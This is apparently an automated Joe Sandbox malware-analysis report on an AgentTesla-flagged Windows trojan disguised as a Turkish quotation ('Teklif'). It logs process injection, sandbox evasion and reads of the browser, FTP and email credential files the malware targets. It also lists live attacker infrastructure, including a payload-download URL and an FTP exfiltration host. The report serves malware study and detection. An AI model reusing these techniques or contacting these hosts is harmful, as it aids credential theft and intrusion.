                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D90000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1290000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: F60000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B20000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: InstallUtil.exe, 00000008.00000002.3330341537.0000000005F70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllturev
                      Source: Ptqlzgvzpfa.exe, 00000005.00000002.2529385322.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                      Source: Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: InstallUtil.exe, 00000002.00000002.2456804856.0000000004F22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                      Source: Ptqlzgvzpfa.exe, 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206321146.0000000000822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                      Source: Ptqlzgvzpfa.exe, 00000004.00000002.2443133058.0000000001043000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2547975039.0000000005F20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 360000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 360000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 360000Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 362000Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 39C000Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 39E000Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5C0008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AE6008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B7D008Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeQueries volume information: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeQueries volume information: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeQueries volume information: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2532815910.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3319267989.0000000002C07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2448653484.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5488, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: Yara match File source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 5488, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: Teklif-6205018797-6100052155-UUE.exe PID: 3060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ptqlzgvzpfa.exe PID: 1120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ptqlzgvzpfa.exe PID: 2928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 5488, type: MEMORYSTR

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | 1 Credentials in Registry | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 12 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

[Behavior graph: ID 1520406; sample Teklif-6205018797-610005215...; start date 27/09/2024; architecture WINDOWS; score 100]

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| Teklif-6205018797-6100052155-UUE.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
| Teklif-6205018797-6100052155-UUE.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |

No Antivirus matches

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe | |
| https://account.dyn.com/ | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe | |
| https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe | |

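| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| wymascensores.com | 67.212.175.162 | true | true | | unknown |
| ftp.alternatifplastik.com | 5.2.84.236 | true | true | | unknown |
| 50.23.12.20.in-addr.arpa | unknown | unknown | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://wymascensores.com/img/Tcghz.wav | true | | unknown |
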
| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| https://github.com/mgravell/protobuf-net | Teklif-6205018797-6100052155-UUE.exe | false | | unknown |
| https://github.com/mgravell/protobuf-neti | Teklif-6205018797-6100052155-UUE.exe | false | | unknown |
| https://stackoverflow.com/q/14436606/23354 | Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe | false | URL Reputation: safe | unknown |
| https://account.dyn.com/ | Teklif-6205018797-6100052155-UUE.exe, InstallUtil.exe, Ptqlzgvzpfa.exe | false | URL Reputation: safe | unknown |
| https://github.com/mgravell/protobuf-netJ | Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe | false | | unknown |
| https://wymascensores.com | Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe | false | | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Teklif-6205018797-6100052155-UUE.exe, InstallUtil.exe, Ptqlzgvzpfa.exe | false | URL Reputation: safe | unknown |
| https://stackoverflow.com/q/11564914/23354; | Teklif-6205018797-6100052155-UUE.exe | false | URL Reputation: safe | unknown |
| https://stackoverflow.com/q/2152978/23354 | Teklif-6205018797-6100052155-UUE.exe | false | URL Reputation: safe | unknown |
| https://wymascensores.com/img/Tcghz.wav7__AsyncLocalScope_Current__ | Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe.0.dr | false | | unknown |
| http://ftp.alternatifplastik.com | InstallUtil.exe | false | | unknown |

| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 67.212.175.162 | wymascensores.com | United States | 32475 | SINGLEHOP-LLCUS | true |
| 5.2.84.236 | ftp.alternatifplastik.com | Turkey | 3188 | ALASTYRTR | true |

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520406
Start date and time: 2024-09-27 10:42:27 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Teklif-6205018797-6100052155-UUE.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@5/2
EGA Information:
• Successful, ratio: 83.3%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 420
• Number of non-executed functions: 36
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target InstallUtil.exe, PID 5488 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Teklif-6205018797-6100052155-UUE.exe

| Time | Type | Description |
| --- | --- | --- |
